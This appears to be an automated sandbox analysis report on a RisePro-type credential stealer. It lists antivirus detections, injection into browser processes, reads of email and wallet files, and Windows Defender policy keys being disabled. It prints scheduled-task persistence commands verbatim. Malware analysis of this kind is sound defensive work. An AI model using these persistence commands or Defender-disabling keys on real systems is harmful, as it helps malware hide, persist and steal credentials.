RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Feb. 10, 2024, 2:38 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Network activity contains more than one unique useragent (2 events)

process	hunta.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

One or more non-whitelisted processes were created (15 events)

parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\6ba4bacf-9712-4944-82ed-c3b1ff9122cc.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Local\Temp\\c3c87995-676e-4f72-8350-9111d3bc0359.dmp"
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1156,15774904545762433920,4093870059638722254,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=5A2F09549641B91DCA6C40259C0DDBC6 --mojo-platform-channel-handle=1164 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1616 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1124,4771041589543451130,17175966221262014770,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=A7779463E53D84E04E1E56AE4C57316B --mojo-platform-channel-handle=1164 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1256 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
parent_process	firefox.exe	martian_process	"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\minidumps\9d1d02e8-e52e-4b7c-a24c-39f14a1c6ae0.dmp"
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=1632 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1156,4585187372567679267,6574529224183986678,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=867986BF27614696DFD3BF5AFB20DF69 --mojo-platform-channel-handle=1172 --ignored=" --type=renderer " /prefetch:2
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef3e9f1e8,0x7fef3e9f1f8,0x7fef3e9f208

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Appends a known multi-family ransomware file extension to files that have been encrypted (4 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\MultiDoge\multidoge.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\qxo5wa6x.default-release\parent.lock
file	C:\Users\test22\AppData\Local\Temp\firefox\parent.lock

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 65 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 744 resumed a thread in remote process 3068
Process injection	Process 744 resumed a thread in remote process 1892
Process injection	Process 744 resumed a thread in remote process 1736
Process injection	Process 744 resumed a thread in remote process 1320
Process injection	Process 744 resumed a thread in remote process 2352
Process injection	Process 744 resumed a thread in remote process 2948
Process injection	Process 2088 resumed a thread in remote process 192
Process injection	Process 2116 resumed a thread in remote process 3068
Process injection	Process 1320 resumed a thread in remote process 2796
Process injection	Process 2424 resumed a thread in remote process 1892
Process injection	Process 2352 resumed a thread in remote process 1168
Process injection	Process 936 resumed a thread in remote process 1736
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 1736	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 1320	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2352	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 2948	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 192	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 3068	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 2796	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:40 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1892	1	0	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000000000000044 suspend_count: 1 process_identifier: 1168	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1736	1	0	0
NtResumeThread Feb. 10, 2024, 2:39 p.m.	thread_handle: 0x0000000000000154 suspend_count: 2 process_identifier: 1736	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Feb. 10, 2024, 2:38 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 50 89 e0 05 04 00 00 00 exception.symbol: hunta+0x2e631d exception.instruction: in eax, dx exception.module: hunta.exe exception.exception_code: 0xc0000096 exception.offset: 3040029 exception.address: 0xfe631d registers.esp: 3734840 registers.edi: 4294940916 registers.eax: 1447909480 registers.ebp: 4005011476 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 16654435 registers.ecx: 20	1	0	0

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Bkav	W32.AIDetectMalware
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Generic.vc
Cylance	unsafe
Sangfor	Suspicious.Win32.Save.a
Cybereason	malicious.cb9c36
Symantec	ML.Attribute.HighConfidence
tehtris	Generic.Malware
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
McAfee	Artemis!CEB083F9F6B6
Avast	Win32:TrojanX-gen [Trj]
Kaspersky	VHO:Trojan-PSW.Win32.Convagent.gen
FireEye	Generic.mg.ceb083f9f6b650cd
Sophos	Mal/RisePro-A
Google	Detected
Gridinsoft	Trojan.Heur!.038120A1
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	VHO:Trojan-PSW.Win32.Convagent.gen
AhnLab-V3	Trojan/Win.TrojanX-gen.R634440
BitDefenderTheta	Gen:NN.ZexaF.36744.vE0aa0OCGyik
DeepInstinct	MALICIOUS
VBA32	BScope.TrojanPSW.RisePro
Malwarebytes	Trojan.MalPack
Zoner	Probably Heur.ExeHeaderL
SentinelOne	Static AI - Malicious PE
Fortinet	W32/Agent.BFB5!tr
AVG	Win32:TrojanX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (D)

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

Executed a process and injected code into it, probably while unpacking (50 out of 225 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2760 thread_handle: 0x0000019c process_identifier: 2756 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a0	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2844 thread_handle: 0x000001a8 process_identifier: 2840 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2536	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1216 thread_handle: 0x00000720 process_identifier: 744 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000724	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2608 thread_handle: 0x00000720 process_identifier: 2620 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\reZ6hWk3uTMCU8DEiLuN.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\reZ6hWk3uTMCU8DEiLuN.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\reZ6hWk3uTMCU8DEiLuN.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000071c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 204 thread_handle: 0x00000724 process_identifier: 452 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000072c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 3012 thread_handle: 0x00000724 process_identifier: 1332 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000071c	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 3048 thread_handle: 0x0000072c process_identifier: 3056 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000730	1	1
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1384 thread_handle: 0x000001d4 process_identifier: 2088 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files (x86)\Internet Explorer\iexplore.exe track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome filepath_r: C:\Program Files (x86)\Internet Explorer\iexplore.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000001d8	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000268 suspend_count: 1 process_identifier: 744	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1632 thread_handle: 0x000002c4 process_identifier: 3068 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.youtube.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d0	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 3068	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1256 thread_handle: 0x000002c4 process_identifier: 1892 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000002c4 suspend_count: 1 process_identifier: 1892	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1616 thread_handle: 0x00000288 process_identifier: 1736 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" https://accounts.google.com filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000224	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000288 suspend_count: 1 process_identifier: 1736	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2472 thread_handle: 0x0000027c process_identifier: 1320 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002d0	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x0000027c suspend_count: 1 process_identifier: 1320	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2592 thread_handle: 0x000001e0 process_identifier: 2352 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000028c	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x000001e0 suspend_count: 1 process_identifier: 2352	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 1308 thread_handle: 0x00000290 process_identifier: 2948 current_directory: C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs filepath: C:\Program Files\Mozilla Firefox\firefox.exe track: 1 command_line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com filepath_r: C:\Program Files\Mozilla Firefox\firefox.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 2948	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2088	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 152 thread_handle: 0x00000338 process_identifier: 192 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2088 CREDAT:145409 filepath_r: stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000033c	1	1
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000338 suspend_count: 1 process_identifier: 192	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000408 suspend_count: 1 process_identifier: 2088	1	0
NtResumeThread Feb. 10, 2024, 2:38 p.m.	thread_handle: 0x00000290 suspend_count: 1 process_identifier: 2088	1	0
